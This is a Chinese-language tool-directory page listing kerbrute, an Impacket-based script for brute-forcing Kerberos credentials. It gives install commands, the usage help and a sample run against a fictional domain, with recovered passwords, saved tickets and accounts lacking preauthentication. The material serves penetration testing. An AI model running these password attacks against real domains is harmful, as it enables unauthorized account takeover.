Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
kerbrute — 一个使用 impacket 进行 Kerberos 暴力破解的脚本 | Kitploit
工具/GitHubGitHub/tarlogicsecurity/kerbrute
密码攻击渗透测试身份验证
GitHubtarlogicsecurity/kerbrute

kerbrute

一个使用 impacket 进行 Kerberos 暴力破解的脚本

查看仓库
45777156年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

kerbrute

一个通过使用 Impacket 库执行 Kerberos 暴力破解的脚本。

执行时,输入接收一个用户或用户列表以及一个密码或密码列表。然后进行暴力破解攻击以枚举:

  • 有效的用户名/密码组合
  • 有效的用户名
  • 不需要预认证的用户名

结果,脚本会生成发现的凭证列表,以及由这些有效凭证生成的 TGT。

安装

从 pypi:

root@kitploit:~
pip3 install kerbrute

从仓库:

root@kitploit:~
git clone https://github.com/TarlogicSecurity/kerbrute
cd kerbrute
pip install -r requirements.txt

使用

无参数帮助:

root@kitploit:~
root@kali:~# kerbrute
Impacket v0.9.18 - Copyright 2018 SecureAuth Corporation

usage: kerbrute.py [-h] [-debug] (-user USER | -users USERS)
                   [-password PASSWORD | -passwords PASSWORDS] -domain DOMAIN
                   [-dc-ip <ip_address>] [-threads THREADS]
                   [-outputfile OUTPUTFILE] [-no-save-ticket]

optional arguments:
  -h, --help            显示此帮助信息并退出
  -debug                开启 DEBUG 输出
  -user USER            要执行暴力破解的用户
  -users USERS          每行一个用户的文件
  -password PASSWORD    要执行暴力破解的密码
  -passwords PASSWORDS  每行一个密码的文件
  -domain DOMAIN        要执行暴力破解的域
  -dc-ip <ip_address>   域控制器的 IP 地址
  -threads THREADS      执行暴力破解的线程数。默认 = 1
  -outputfile OUTPUTFILE
                        保存发现的 user:password 的文件
  -no-save-ticket       不保存通过正确凭证获取的 TGT

示例: 
	./kerbrute.py -users users_file.txt -passwords passwords_file.txt -domain contoso.com

执行示例:

root@kitploit:~
root@kali:~# kerbrute -domain jurassic.park -users users.txt -passwords passwords.txt -outputfile jurassic_passwords.txt
Impacket v0.9.18 - Copyright 2018 SecureAuth Corporation

[*] Stupendous => triceratops:Sh4rpH0rns
[*] 已保存 TGT 到 triceratops.ccache
[*] 有效用户 => velociraptor [未预认证]
[*] 有效用户 => trex
[*] 已保存发现的密码到 jurassic_passwords.txt
下载工具